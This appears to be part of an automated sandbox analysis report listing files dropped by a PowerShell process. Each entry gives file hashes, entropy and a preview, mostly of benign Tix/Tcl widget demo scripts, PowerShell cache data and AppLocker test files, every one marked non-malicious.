                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: SText.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixScrolledText widget...#....proc RunSample {w} {.... # We create the frame and the ScrolledText widget.. # at the top of the dialog box.. #.. frame $w.top -relief raised -bd 1.... # Create a Scrolled Text widget... #.. tixScrolledText $w.top.a.. pack $w.top.a -expand yes -fill both -padx 10 -pady 10 -side left.... # Use a ButtonBox to hold the buttons... #.. tixButtonBox $w.box -orientation horizontal.. $w.box add ok -text Ok -underline 0
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2807
                                                                                                                                                                                                              Entropy (8bit):4.744066417650343
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:qyXvUTSulurP4Nd0qeD7nFcDo6byufcMJbgwl9TSC9fZWjr4ks18eiP1Rb:5fUOul2POlUZsvffbgwl9TScfZKdo89r
                                                                                                                                                                                                              MD5:199D62AD6CBB864777868564348EAC1C
                                                                                                                                                                                                              SHA1:31472F5628F8CB3824F11D061244824331DA7E47
                                                                                                                                                                                                              SHA-256:63BBFC5CB9977FE801DA0FD33352027C13DEF4CE851EA7F4B2255FBEA36EF5A5
                                                                                                                                                                                                              SHA-512:950C935BC1DC42483C4A2A747E00F42C5F271CEC83C23A7CF3112D951F8551BA5B2B21858075DA6E9C27A4E46C67BFA73211BDE03B4BB409F06E774ABBD3AE06
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: SWindow.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixScrolledWindow widget...#....proc RunSample {w} {.... # We create the frame and the ScrolledWindow widget.. # at the top of the dialog box.. #.. frame $w.top -relief raised -bd 1.... # Create a complex window inside the ScrolledWindow widget... # ScrolledWindow are very convenient: unlink the canvas widget,.. # you don't need to specify the scroll-redions for the.. # ScrolledWindow. It will automatically adjust itself to fit.. # size of the "window" sub
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1065
                                                                                                                                                                                                              Entropy (8bit):4.953277488626373
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:M2usaU3TB/8eMyIvhKhtcC2yEZQNzy/5PfNnmrJx6PSsRi:xFyXvYhSfyEZQ1u5PflmrJMP1Ri
                                                                                                                                                                                                              MD5:5B373C1DAB6A47CA4CBAF92458124962
                                                                                                                                                                                                              SHA1:7C9D48544A50B9D7C2B5CC146FAD1C4B503D78D7
                                                                                                                                                                                                              SHA-256:E4C09FAFC512D7C43674534CC52C8C08B9E6DFB023A39416AB723CB339BE9AC1
                                                                                                                                                                                                              SHA-512:0B0BF3E7434B37D92B4CBDB3C029E2B2E7550A3E28A605E97BACB3B6DB27A9E4DC029227E9DE2D329AD73A86F1FAF4F110161841943E5E4F311B333881FDE9BE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Sample.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# REPLACE WITH DESCRIPTION OF THIS DEMO...#....proc RunSample {w} {.. set top [frame $w.f -bd 1 -relief raised].. set box [tixButtonBox $w.b -bd 1 -relief raised].... pack $box -side bottom -fill both.. pack $top -side top -fill both -expand yes...... # Create the buttons.. #.. $box add ok -text Ok -command "destroy $w" -width 6.. $box add cancel -text Cancel -command "destroy $w" -width 6..}....if {![info exists tix_demo_running]} {.. wm withdraw ... set w .demo.. toplevel $w; wm t
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3433
                                                                                                                                                                                                              Entropy (8bit):4.776901222567246
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:2AyXv0nKHmAQgBpeJj7+g2epp4yQ4M7+oPBB2pUYRl3pMZNFPY9fZsTrhbsJGhh+:2bf0KHmATSdr/Q4EBAfewfZsT1f+
                                                                                                                                                                                                              MD5:722EC43E57FA9F7732F51C4672AA06F4
                                                                                                                                                                                                              SHA1:0EE75F46523DDD612F62C7EE2C4289A098E139A6
                                                                                                                                                                                                              SHA-256:047A63479CEC283E73987346CB9AF9DD0157F39AFB4669509C5BF7EBBC1D16DE
                                                                                                                                                                                                              SHA-512:08EC044C24C3C7169831F3C7EC58C72B844BA21482E360AD2EF63A3BB432F453B79E3BDCC1A9C0EBB8FD8B3707A362B3F27AFBEC0995D781235FE27C89B4948C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Select.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixSelect widget...#..proc RunSample {w} {.. global demo_dir.... # Create the frame on the top of the dialog box with two tixSelect.. # widgets inside... #.. frame $w.top.... # There can be one and only type of justification for any piece of text... # So we set -radio to be true. Also, -allowzero is set to false: the user.. # cannot select a "none" justification.. #.. tixSelect $w.top.just -allowzero false -radio true \...-label "Justification: "\...-opt
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2351
                                                                                                                                                                                                              Entropy (8bit):4.873627783053149
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:byXvzuXBLUAB8gvGrwxF9lbSRdQPHs347mT1u01yTH1Kn1hyF+P1Ri:efgUALvCMNJm47mTc0EH0nH3i
                                                                                                                                                                                                              MD5:11B7D0A26C288ED08FA8F9A142930F47
                                                                                                                                                                                                              SHA1:5E445D701BC1C84306EDE466079F8CEB75FAB865
                                                                                                                                                                                                              SHA-256:DF32E7616D982D73278FBA4E418E9FD78777CAEFF9C08A0E8C1B86B3962E8910
                                                                                                                                                                                                              SHA-512:85FD8203C28868FDCF196BBA8B6674B53C34A09B3F7E1CB5FE739DC1E5A73C3C69F6D50D7CD0355E366FCDE5306F8D9B4AC1B412B1D11C16D1CBC3B4069AB457
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: StdBBox.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixStdButtonBox widget, which is a..# group of "Standard" buttons for Motif-like dialog boxes...#..proc RunSample {w} {.... # Create the label on the top of the dialog box.. #.. label $w.top -padx 20 -pady 10 -border 1 -relief raised -text \..."This dialog box is\n a demostration of the\n tixStdButtonBox widget" \...-justify center -anchor c.... # Create the button box. We also do some manipulation of the.. # button widgets inside: we disable the help button and chang
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2744
                                                                                                                                                                                                              Entropy (8bit):4.7400121876074515
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:udyXvWFrSQlumBD7PBPErrSO7r4r9qQyeJJfJ5JoZG9fZWjr4ksJHeiP1Rs9a:5frQlPZOL7cpqInRYWfZKdW93Oa
                                                                                                                                                                                                              MD5:174B68660C0163601FF0C9941AE41E88
                                                                                                                                                                                                              SHA1:6725F14BDB65011BF3A5B17BBD8465AB640F9B64
                                                                                                                                                                                                              SHA-256:22396DD36FBDAB8EA59EE5A8DE697398A63A86A1763CEA84B9D7F9D5405D5407
                                                                                                                                                                                                              SHA-512:8D9138D93255B7741CF40FC8F742A6904A3295881E2D358BA3D535E9AAE96026CA7913AFD6440F25251A4C3E2CC8678073EDD32F5E4E3C4934ED40FD5EA1A289
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Tree.tcl,v 1.4 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates how to use the TixTree widget to display..# hierachical data (A hypothetical DOS disk drive)...#....proc RunSample {w} {.... # We create the frame and the ScrolledHList widget.. # at the top of the dialog box.. #.. frame $w.top -relief raised -bd 1.... # Create a TixTree widget to display the hypothetical DOS disk drive.. # .. #.. tixTree $w.top.a -options {...separator "\\".. }.... pack $w.top.a -expand yes -fill both -padx 10 -pady 10 -side left.. .. set tree $w.top
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3009
                                                                                                                                                                                                              Entropy (8bit):4.163624754942491
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:gyXvgCoWkSzphud3rDPfZWjr4ksJHeiP1Rb:7fzkSVhe3fZKdW93b
                                                                                                                                                                                                              MD5:4E438F3F65A95AD218F1C3C2E383AC93
                                                                                                                                                                                                              SHA1:A0C570763A65EA011AEE287514A16617F24F8175
                                                                                                                                                                                                              SHA-256:A5CD5EED2739FCD01D7F2F5942C65F8E3D3DEFF281C4A8E8FBBA80DF37E379BA
                                                                                                                                                                                                              SHA-512:73BB755CD81D4B92C2856B0296461158256FDA6C1054843FD98FF0D448ACD749E087AF3E5586246B64D57B3AF3271115225FD4B0333BD8B35792A5327834256F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Xpm.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of XPM images...#....proc RunSample {w} {.... set hard_disk_pixmap {/* XPM */...static char * drivea_xpm[] = {... /* width height ncolors chars_per_pixel */... "32 32 5 1",... /* colors */... " .s None.c None",... "..c #000000000000",... "X.c white",... "o.c #c000c000c000",... "O.c #800080008000",... /* pixels */... " ",... " ",... " ",... "
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3557
                                                                                                                                                                                                              Entropy (8bit):4.273858055930155
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:PyXv1CoWkSzpISNluVd8TuW1WWp9fZWjr4ks1KeiP1N:afykSVDNlAKTuuWQfZKdoK9/
                                                                                                                                                                                                              MD5:3FB6000F37CCA6F51B2933166642DDBB
                                                                                                                                                                                                              SHA1:CC62588722C8AE3BECB65AA6A6C352C6878AE0E8
                                                                                                                                                                                                              SHA-256:74634645297A240D0C216D6455C2FE918AF2857A1F0975A3FF0B11B6F1633193
                                                                                                                                                                                                              SHA-512:2B7C49E0135037213F1DC7D085DD2FCA3F9FB584A40B31A909A5668C2E434D6536396F4C40CA70C539140D1CA16223ACC13C439793182D49EAB3FAFF266D43CB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Xpm1.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of XPM images in the menu...#....proc RunSample {w} {.... set hard_disk_pixmap {/* XPM */...static char * drivea_xpm[] = {... /* width height ncolors chars_per_pixel */... "32 32 5 1",... /* colors */... " .s None.c None",... "..c #000000000000",... "X.c white",... "o.c #c000c000c000",... "O.c #800080008000",... /* pixels */... " ",... " ",... " ",... "
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3897
                                                                                                                                                                                                              Entropy (8bit):4.791128330535721
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:eLaVhMn0Vk6pPrWumXiOkFg+RO22ANFAewbwJEFzSSTPgPOHPp4GPZlwKqUSi:eeVqn0Vk0PrWumXiOke+RO22ANFAewbh
                                                                                                                                                                                                              MD5:86734F3397F82895CEEA893D5294BF05
                                                                                                                                                                                                              SHA1:1DC7EEC937CF7C6A08EAE59F09074C57B19E3532
                                                                                                                                                                                                              SHA-256:D94E63965733460544427BEB671228ED11123FFA51AE8D1D28FB04AD2B81F88B
                                                                                                                                                                                                              SHA-512:95CA72483A3383B5D3583125FD3098A0B7C30EB087E3CC475FF1DD92EFE260F5F610DC757A17247AC391F70DF99EFABAEF3E73FDE2B6FFCAD090EC1656C61E71
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# Tcl autoload index file, version 2.0..# This file is generated by the "auto_mkindex" command..# and sourced to set up indexing information for one or..# more commands. Typically each line is a command that..# sets an element in the auto_index array, where the..# element name is the name of a command and the value is..# a script that loads the command.....set auto_index(MkChoosers) [list source [file join $dir MkChoose.tcl]]..set auto_index(MkCombo) [list source [file join $dir MkChoose.tcl]]..set auto_index(stCmd) [list source [file join $dir MkChoose.tcl]]..set auto_index(stValidate) [list source [file join $dir MkChoose.tcl]]..set auto_index(MkControl) [list source [file join $dir MkChoose.tcl]]..set auto_index(MkSelect) [list source [file join $dir MkChoose.tcl]]..set auto_index(MkOptMenu) [list source [file join $dir MkChoose.tcl]]..set auto_index(MkFileEnt) [list source [file join $dir MkChoose.tcl]]..set auto_index(MkFileBox) [list source [file join $dir MkChoose.tcl]]..set au
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9356
                                                                                                                                                                                                              Entropy (8bit):4.940860035098135
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:r3dJThiDOE5UDx8ZikCU7YN3qRVWt1hJjZDLvxPofEU0U5l6DzfKe:rtJT5ECDDfO6LhofEvUmF
                                                                                                                                                                                                              MD5:D675F0E73C52A091F68C8E24CC0268AA
                                                                                                                                                                                                              SHA1:B56AC65223BE11F07A87DDE7072EF91C8035A825
                                                                                                                                                                                                              SHA-256:A4C9022069CF000A5EE4A77DC537ACB107FDFF1D3672F7B044870983FB6327B2
                                                                                                                                                                                                              SHA-512:F7727039385463F8CC2E42C09AF49F40B544798407FC5DF468FEA5C000BCFA8350A810DF9B115B905E8909DAF30E94F01B66ABDE84995F761B2842C0A2E2D581
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..# tixDemo --..#..# .This is a demo program of all the available Tix widgets. If..#.have installed Tix properly, you can execute this program..#.by changing to this directory and executing..#.the following in csh..#..#..% env TIX_LIBRARY=../library tixwish tixwidgets.tcl..#..#.Or this in sh..#..#..$ TIX_LIBRARY=../library tixwish tixwidgets.tcl..#..#----------------------------------------------------------------------..#..#.This file has not been properly documented. It is NOT intended..#.to be used as an introductory demo program about Tix..#.programming. For such demos, please see the files in the..#.demos/samples directory or go to the "Samples" page in the..#."widget demo"..#..#..# Copyright (c) 1996, Expert Interface Technologies..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....package require Tix..tix initstyl
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:POSIX shell script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13761
                                                                                                                                                                                                              Entropy (8bit):4.662429791492026
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:dt9POJ5YezSnq5Nc3DfMGP6ZNq1Sj/JXU7abCjH7x7HtnzM5nSAom:drPOnYpDfN6ZkOl/uBHJcD
                                                                                                                                                                                                              MD5:271451AEC3001E8B5288F7D7DED1113D
                                                                                                                                                                                                              SHA1:9C74C551CA4E54C02942C9426324A55439686F04
                                                                                                                                                                                                              SHA-256:82FC32FC51612270DE8D70CC14A20AB2428F50A782DF707D2ACA1083F0455F91
                                                                                                                                                                                                              SHA-512:A183FC1D14A3C6043A28B591A4BE9C01C8A98A31590659400D76D6A15C6658B39FD45FD56F126FFFFB98077511C15648E69B459EA7246FFBD6E60875EEADBD8B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#!/bin/sh..# the next line restarts using wish \..exec wish "$0" "$@"....# widget --..#..# This script demonstrates the various widgets provided by Tix,..# along with many of the features of the Tix library. This file..# only contains code to generate the main window for the..# application, which invokes individual demonstrations. The..# code for the actual demonstrations is contained in separate..# ".tcl" files in the samples/ subdirectory, which are sourced..# by this script as needed...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1996 Sun Microsystems, Inc...# Copyright (c) 1998-2000 Scriptics Corporation...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...# $Id: widget,v 1.7 2008/03/17 22:58:51 hobbs Exp $....package require Tix..tix initstyle..eval destroy [w
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9434
                                                                                                                                                                                                              Entropy (8bit):4.928515784730612
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                                                                                                                              MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                                                                                                                              SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                                                                                                                              SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                                                                                                                              SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1440
                                                                                                                                                                                                              Entropy (8bit):5.324175265824885
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:3BNn4SKco4KmM6GjKbm51s4RPQoUe7u1o+m9qr9t7J0gt/NKVkr8HvSvUUav:xNn4SU4YymI4RIoUeCa+m9qr9tK8NCkO
                                                                                                                                                                                                              MD5:63E20C2852B7AF7F401047A9417ACF8C
                                                                                                                                                                                                              SHA1:49A30502ACE37064A17051E00EF60FCDA4974A44
                                                                                                                                                                                                              SHA-256:23505989AA0C8589324D90C0B16106C35069C412633B85ACE06B2A4435D427DB
                                                                                                                                                                                                              SHA-512:7662144338638403D9A3E850D95D0FBAEB91921EF4DD142A8ACD2190021DF661BC84A89231F21C812DC277F4A9083C92F81B8F7279B9111B792F480D251EEE23
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:@...e...........8...............................................H...............x..}...@..."~.u....... .System.IO.Compression.FileSystemH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Ut
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
